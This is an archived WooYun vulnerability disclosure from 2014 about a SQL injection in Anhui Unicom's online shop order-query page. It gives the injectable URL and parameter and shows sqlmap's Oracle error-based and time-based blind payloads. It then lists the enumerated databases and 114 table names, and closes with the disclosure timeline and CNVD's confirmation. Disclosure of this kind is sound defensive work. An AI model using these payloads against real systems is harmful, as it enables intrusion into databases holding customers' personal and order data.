乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-09: 细节已通知厂商并且等待厂商处理中 2014-09-14: 厂商已经确认,细节仅向厂商公开 2014-09-24: 细节向核心白帽子及相关领域专家公开 2014-10-04: 细节向普通白帽子公开 2014-10-14: 细节向实习白帽子公开 2014-10-24: 细节向公众公开
联通
安徽联通网上商城http://www.ah165.net/shop/
点击我的订单
在证件号码 和订单编号输入a然后点查询
将a换成a'查询
抓包
http://www.ah165.net/shop/order/query/list?time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a
注入点http://www.ah165.net/shop/order/query/list?time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cardType Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: time=1410239213386&cardType=1) AND 9251=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(121)||CHR(115)||CHR(113)||(SELECT (CASE WHEN (9251=9251) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(114)||CHR(115)||CHR(107)||CHR(113)) AND (2239=2239&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: time=1410239213386&cardType=1) AND 6622=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (1454=1454&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a---
web application technology: JSPback-end DBMS: Oracle
数据库
available databases [19]:[*] AHECWMP[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
Database: AHECWMP[114 tables]+----------------------------+| TB_ACTIVITY_PAGE || TB_AGENT || TB_AGENT_APPLY || TB_AGENT_ARTICLE || TB_AGENT_DEVELOP_SITE || TB_AGENT_EMPLOYEE || TB_AGENT_PAYMENT || TB_AGENT_SERV || TB_AGENT_SHOWCASE || TB_AGENT_STAFF || TB_AGREEMENT || TB_ARRIVAL_NOTICE || TB_ARTICLE || TB_ARTICLE_CATEGORY || TB_BSS_AGENT || TB_BSS_MOBILE || TB_BSS_MOBILE_LOG || TB_BSS_MOBILE_OUT || TB_BUSINESS_HALL || TB_CLICKSTREAM || TB_CLICKSTREAM_REQUESTS || TB_CLUB_EXPERT || TB_CLUB_MEMBER || TB_COMMISSION_DEAL || TB_COMMISSION_EXCEL || TB_COMMISSION_LOG || TB_COMMISSION_RULE || TB_COMMISSION_RULE_AGENT || TB_COMMISSION_RULE_NETCARD || TB_CONTRACT || TB_CONTRACT_DETAIL || TB_CONTRACT_DETAIL_BAK || TB_CONTRACT_DETAIL_BAK1 || TB_CONTRACT_TEMPLATE || TB_COUPON || TB_COUPON_CODE || TB_COURSE || TB_COURSE_APPLY || TB_COURSE_SCHEDULE || TB_CPS_CODE || TB_CPS_LOG || TB_CPS_YIQIFA || TB_CUSTOMER || TB_DELIVERY_CORP || TB_DELIVERY_TYPE || TB_DEVELOP_SITE || TB_EMAIL_SENDLIST || TB_FRIEND_LINK || TB_GOODS || TB_GOODS_ACTIVITY || TB_GOODS_AGENT || TB_GOODS_AGENT_BAK || TB_GOODS_AREA || TB_GOODS_ATTRIBUTE || TB_GOODS_BRAND || TB_GOODS_CATEGORY || TB_GOODS_EXTEND || TB_GOODS_STORE || TB_MEMBER || TB_MOBILE || TB_MOBILE_BUSINESS || TB_MOBILE_GOODS || TB_MOBILE_GRADE || TB_MOBILE_GRADE_BAK || TB_MOBILE_LOG || TB_MOBILE_OUT || TB_MOBILE_PLUGIN || TB_MOBILE_RULE || TB_MOBILE_RULE_LIB || TB_MOBILE_RULE_SUIT || TB_MOBILE_STATUS || TB_MT || TB_ORDER || TB_ORDER_ITEM || TB_ORDER_LOG || TB_ORDER_REVIEW || TB_ORDER_TWICE || TB_PAYMENT || TB_PAYMENT_CONFIG || TB_PREBOOK_MOBILE || TB_REFEREE || TB_REFUND || TB_REGIONAL || TB_REPORT_STORE || TB_SCORE_LOG || TB_SCORE_RULE || TB_SHIPPING || TB_SHOWCASE || TB_SHOWCASE_GOODS || TB_STAFF_DEVELOP_CHANNEL || TB_STORE_BOOK || TB_SUIT || TB_SUIT_CARD || TB_SUIT_CONTRACT || TB_TRIAL_CARD_APPLY || TB_UNICOM_ORDER || TB_UNICOM_ORDER_FILE || TB_VAA_BAK || TB_VAS || TB_VAS_CONFIG || TMP_GOODS || TP_PUB_AREA || TP_PUB_COUNTY || TP_PUB_INTE_AUTH || TP_PUB_IP_ADDRESS || TP_PUB_LOG || TP_PUB_MENU || TP_PUB_PARA || TP_PUB_PURVIEW || TP_PUB_ROLE || TP_PUB_SITE || TP_PUB_STAFF || TP_PUB_STAFF_BAK || TP_PUB_STAFF_ROLE |+----------------------------+
危害等级:中
漏洞Rank:10
确认时间:2014-09-14 12:02
CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置。
暂无